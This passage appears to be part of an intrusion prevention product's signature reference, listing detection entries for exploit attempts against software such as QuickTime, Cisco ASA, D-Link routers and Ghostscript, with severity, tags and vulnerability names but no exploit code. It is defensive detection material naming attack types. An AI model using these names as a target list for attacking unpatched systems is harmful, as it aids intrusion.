About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Subversion detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Subversion, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Apache-Subversion-SVN-SSH-Url-Command-Execution
Description:
Back to top

File-TextId_Apple-iPhoto-Xml-Title-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple iPhoto detected
Context: Identified Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple iPhoto, CVE2007, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-581-5211
Vulnerability: HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability
Description:
Back to top

File-TextId_Apple-iTunes-M3u-Playlist-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2005, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-iTunes-Playlist-Handling-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-iTunes-Playlist-File-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-iTunes-PLS-Playlist-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple iTunes detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-iTunes-Playlist-Handling-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783

About this situation: An attempt to exploit Apple SceneKit was detected
Context: Identified Text File Stream
Severity: 7
Tags: OS X, Any Hardware, Apple SceneKit, CVE2015, OS X not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-696-5211
Vulnerability: Apple-OS-X-SceneKit-Buffer-Overflow-CVE-2015-3783
Description:
Back to top

File-TextId_Apple-QuickTime-Plug-In-Security-Bypass

About this situation: Detects security bypass exploits against Apple QuickTime browser plug-in
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Apple-QuickTime-Plug-In-Security-Bypass
Description:
Back to top

File-TextId_Apple-QuickTime-RTSP-URI-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in the Apple QuickTime Player detected
Context: Identified Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2007, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: HTTP-Apple-QuickTime-RTSP-URI-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple QuickTime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Streaming-Debug-Error-Logging-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-463-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Texml-Color-String-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Apple-QuickTime-Texml-Style-Element-Text-Specification-BOF
Description:
Back to top

File-TextId_Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Apple-QuickTime-Texml-Textbox-Element-Memory-Corruption
Description:
Back to top

File-TextId_Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer Quicktime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Apple-QuickTime-Texml-Transform-Attribute-Parsing-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Quicktime detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-461-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Apple-QuickTime-Text-Track-Descriptors-Heap-Buffer-Overflow
Description:
Back to top

File-TextId_Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Computer Safari detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Webkit-SVG-Markers-Use-After-Free-Memory-Corruption
Description:
Back to top

File-TextId_Apple-Safari-XML-Parser-Infinite-Recursion-DoS

About this situation: An attempt to exploit a Apple Safari XML Parser Infinite Recursion DoS vulnerability.
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-673-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-XML-Parser-Infinite-Recursion-DoS
Description:
Back to top

File-TextId_Apple-Software-Update-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Apple Software Update detected
Context: Identified Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-991-5242
Vulnerability: Apple-Software-Update-Remote-Command-Execution
Description:
Back to top

File-TextId_Arcserve-UDP-Authentication-Bypass-CVE-2023-26258

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1608-5242
Last changed: sgpkg-ips-1608-5242
Vulnerability: Arcserve-UDP-Authentication-Bypass-CVE-2023-26258
Description:
Back to top

File-TextId_Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Arcserve-Unified-Data-Protection-Asnative.dll-Validate-Denial-Of-Service
Description:
Back to top

File-TextId_Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-825-5242
Vulnerability: Arcserve-Unified-Data-Protection-Management-Service-Information-Disclosure
Description:
Back to top

File-TextId_Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Arcserve Unified Data Protection detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Arcserve Unified Data Protection, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Arcserve-Unified-Data-Protection-Rpsservice4cpmimpl-Unrestricted-File-Upload
Description:
Back to top

File-TextId_Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Astonsoft DeepBurner
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Astonsoft DeepBurner, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Astonsoft-DeepBurner-Path-Attribute-Buffer-Overflow
Description:
Back to top

File-TextId_Barracuda-ESG-Parameter-Injection-CVE-2023-7102

About this situation: An attempt to exploit a vulnerability in Barracuda ESG detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Barracuda ESG, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1670-5242
Last changed: sgpkg-ips-1670-5242
Vulnerability: Barracuda-ESG-Parameter-Injection-CVE-2023-7102
Description: CVE References: CVE-2023-7102
Back to top

File-TextId_Belkin-Wemo-UPnP-RCE-CVE-2018-6692

About this situation: An attempt to exploit a vulnerability in Belkin Wemo detected
Context: Identified Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Belkin Wemo, CVE2018, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1515-5242
Vulnerability: Belkin-Wemo-UPnP-RCE-CVE-2018-6692
Description:
Back to top

File-TextId_BitTorrent-Torrent-Metainfo-File

About this situation: Detects BitTorrent .torrent file downloads
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

File-TextId_BitTorrent-Tracker-Response

About this situation: Detects BitTorrent tracker responses
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

File-TextId_CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection

About this situation: An attempt to exploit a vulnerability in CA Total Defense Suite detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Total Defense Suite, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection
Description:
Back to top

File-TextId_Chamilo-Remote-Command-Execution-CVE-2023-34960

About this situation: An attempt to exploit a vulnerability in Chamilo detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chamilo, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1618-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Chamilo-Remote-Command-Execution-CVE-2023-34960
Description:
Back to top

File-TextId_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Vulnerability: Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
Description:
Back to top

File-TextId_Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: Identified Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Cisco Adaptive Security Appliance, CVE2018, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1042-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101
Description:
Back to top

File-TextId_Cisco-Data-Center-Network-Manager-Importts-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1232-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Importts-Command-Injection
Description:
Back to top

File-TextId_Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal
Description:
Back to top

File-TextId_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Data Center Network Manager detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
Description:
Back to top

File-TextId_Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198

About this situation: An attempt to exploit a vulnerability in Cisco IOS XE detected
Context: Identified Text File Stream
Severity: 7
Tags: Cisco, Any Hardware, CVE2023, Cisco not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
Description:
Back to top

File-TextId_Cisco-Remote-Access-VPN-Login-Failure

About this situation: A login failure in Cisco Remote Access VPN detected
Context: Identified Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, CVE2024, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: Cisco-Remote-Access-VPN-Brute-Force-CVE-2024-20481
Description:
Back to top

File-TextId_Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation

About this situation: An attempt to exploit a vulnerability in Citrix ICA Win32 Program Neighborhood Agent detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Citrix Program Neighborhood Agent, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Citrix-Program-Neighborhood-Agent-Arbitrary-Shortcut-Creation
Description:
Back to top

File-TextId_Citrix-Program-Neighborhood-Agent-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Citrix ICA Win32 Program Neighborhood Agent detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Citrix Program Neighborhood Agent, CVE2004, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Citrix-Program-Neighborhood-Agent-Buffer-Overflow
Description:
Back to top

File-TextId_ClearSCADA-DBServer-Denial-Of-Service

About this situation: ClearSCADA DBServer DOS and potential sensitive information disclosure.
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Schneider Electric ClearSCADA, Windows not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1453-5242
Last changed: sgpkg-ips-1453-5242
Vulnerability: ClearSCADA-DBServer-Denial-Of-Service
Description:
Back to top

File-TextId_Cobalt-Strike-Injector-File

About this situation: Cobalt Strike injector file was detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Cobalt-Strike-Injector-File
Description:
Back to top

File-TextId_Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Commvault CommCell detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Commvault CommCell, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: Commvault-Commcell-Downloadcenteruploadhandler-Arbitrary-File-Upload
Description:
Back to top

File-TextId_D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in D-Link Systems DIR-2640 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link Systems DIR-2640, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1612-5242
Last changed: sgpkg-ips-1612-5242
Vulnerability: D-Link-Dir-2640-HNAP-Loginpassword-Authentication-Bypass-Vulnerability
Description:
Back to top

File-TextId_D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability

About this situation: An attempt to exploit a vulnerability in D-Link Systems DIR-2640 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link Systems DIR-2640, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Vulnerability: D-Link-Dir-2640-HNAP-Prefixlen-Command-Injection-Vulnerability
Description:
Back to top

File-TextId_D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in D-Link Systems DIR-2640 detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link Systems DIR-2640, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1616-5242
Last changed: sgpkg-ips-1616-5242
Vulnerability: D-Link-Dir-2640-HNAP-Privatelogin-Authentication-Bypass-Vulnerability
Description:
Back to top

File-TextId_D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection

About this situation: An attempt to exploit a vulnerability in D-Link DIR-X4860 routers detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: D-Link-Dir-X4860-HNAP-LocalIPAddress-Command-Injection
Description:
Back to top

File-TextId_Disk-Pulse-Enterprise-Server-Client-Component-XML-Buffer-Overflow

About this situation: An attempt to exploit a Disk Pulse Enterprise Server Client Component XML Buffer Overflow vulnerability detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Disk Pulse, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-991-5242
Vulnerability: Disk-Pulse-Enterprise-Server-Cleint-Compnent-XML-Buffer-Overflow
Description:
Back to top

File-TextId_DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041

About this situation: An attempt exploit a vulnerability in Microsoft Windows detected
Context: Identified Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-731-5211
Vulnerability: DLL-Loading-Remote-Code-Execution-Vulnerability-CVE-2016-0041
Description:
Back to top

File-TextId_Document-Template-Injection

About this situation: A possibly malicious Word document file with references to external template detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Word, Windows not specific, Microsoft Word not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1474-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: File-Text_Document-Template-Injection
Description:
Back to top

File-TextId_Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Dries-Buytaert-Drupal-Core-Openid-Module-Information-Disclosure
Description:
Back to top

File-TextId_Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1335-5242
Vulnerability: Drupal-Core-Xml-RPC-Endpoint-Xmlrpc.php-Tags-Denial-Of-Service
Description:
Back to top

File-TextId_EICAR-AntiVirus-Test

About this situation: Detected an EICAR antivirus test file
Context: Identified Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: EICAR-AntiVirus-Test-File
Description:
Back to top

File-TextId_Electronic-Arts-Origin-Client-URI-Handler-Template-Injection

About this situation: An attempt to exploit a vulnerability in Electronic Arts Origin detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Electronic Arts Origin, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1176-5242
Vulnerability: Electronic-Arts-Origin-Client-URI-Handler-Template-Injection
Description:
Back to top

File-TextId_Embedded-Zip-Archive

About this situation: Embedded zip archive
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-TextId_Evernote-For-Mac-Embedded-Link-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Evernote for Mac detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Evernote for Mac, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Evernote-For-Mac-Embedded-Link-Directory-Traversal
Description:
Back to top

File-TextId_Firefox-Browser-XUL-Frame-Tree-Memory-Corruption

About this situation: Attempt to exploit buffer overflow vulnerability in Firefox browser detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Firefox-Browser-XUL-Frame-Tree-Validation-Vulnerability
Description:
Back to top

File-TextId_Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption

About this situation: Mozilla Firefox clipPath SVG stroke-width Memory Corruption detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Firefox-clipPath-SVG-Stroke-Width-Memory-Corruption
Description:
Back to top

File-TextId_Firefox-SVG-JavaScript-Zoom-Memory-Corruption

About this situation: Javascript scaling function in embedded SVG image detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1332-5242
Vulnerability: Firefox-SVG-JavaScript-Zoom-Memory-Corruption
Description:
Back to top

File-TextId_Flash-Embedded-Office-Document

About this situation: Flash embedded office document was detected
Context: Identified Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Flash-Embedded-Office-Document
Description:
Back to top

File-TextId_Flexense-DiskPulse-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Flexense DiskPulse
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Flexense DiskPulse, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Flexense-DiskPulse-Stack-Buffer-Overflow
Description:
Back to top

File-TextId_Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in Free Download Manager.ORG Free Download Manager (FDM) detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Free Download Manager, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Free-Download-Manager-Torrent-File-Parsing-Multiple-Buffer-Overflows
Description:
Back to top

File-TextId_Ghostscript-File-Command-Execution

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1771-5242
Vulnerability: Ghostscript-Eps-File-Command-Execution-CVE-2017-8291
Description:
Back to top

File-TextId_Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this situation: An attempt to exploit a vulnerability in Ghostscript detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ghostscript, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1750-5242
Last changed: sgpkg-ips-1750-5242
Vulnerability: Ghostscript-Format-String-Exploitation-CVE-2024-29510
Description:
Back to top

File-TextId_GLPI-Computervirtualmachine-SQL-Injection

About this situation: An attempt to exploit a vulnerability in GLPI-Project GLPI detected
Context: Identified Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GLPI, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Vulnerability: GLPI-Computervirtualmachine-SQL-Injection
Description:
Back to top

File-TextId_GLPI-Inventory-Agent-SQL-Injection

